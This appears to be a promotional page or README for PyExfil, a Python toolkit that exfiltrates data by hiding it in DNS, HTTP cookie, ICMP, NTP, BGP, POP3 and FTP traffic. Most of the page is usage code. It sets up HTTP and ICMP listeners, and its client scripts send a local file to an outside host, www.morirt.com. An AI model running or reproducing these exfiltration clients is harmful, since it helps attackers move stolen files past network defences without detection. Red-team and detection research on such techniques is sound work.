PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques based around commonly allowed protocols (HTTP, ICMP, DNS etc).
The package is very early stage (alpha release) so is not fully tested, any feedback and commits are welcomed by the author.
Features
Currently PyExfil supports:
- DNS query
- HTTP Cookie
- ICMP (8)
- NTP requests
- BGP Open
- POP3 Authentication (as password)
- FTP MKDIR technique
Usage
HTTP Exfilatration Server
|
1 2 3 4 5 6 7 8 |
#!/usr/bin/python from exfiltration.http_exfiltration import * def main(): print "Starting a listener: " listen("127.0.0.1", 80) if __name__ == "__main__": main() |
HTTP Exfiltration Client
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
#!/usr/bin/python from exfiltration.http_exfiltration import * def main(): FILE_TO_EXFIL = "/bin/bash" ADDR = "www.morirt.com" if send_file(ADDR, FILE_TO_EXFIL) == 0: print "File exfiltrated okay." else: print "Damn thing failed." if __name__ == "__main__": main() |
ICMP Server
|
1 2 3 4 5 6 7 8 9 10 11 12 |
#!/usr/bin/python from exfiltration.icmp_exfiltration import * def main(): ADDR = "127.0.0.1" TMP_PATH = "/tmp/" init_listener(ADDR, TMP_PATH) if __name__ == "__main__": main() |
ICMP Exfiltrator
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
#!/usr/bin/python from exfiltration.icmp_exfiltration import * def main(): FILE_TO_EXFIL = "/bin/bash" ADDR = "www.morirt.com" if send_file(ADDR, FILE_TO_EXFIL) == 0: print "File exfiltrated okay." else: print "Damn thing failed." if __name__ == "__main__": main() |
You can download PyExfil here:
Or read more here.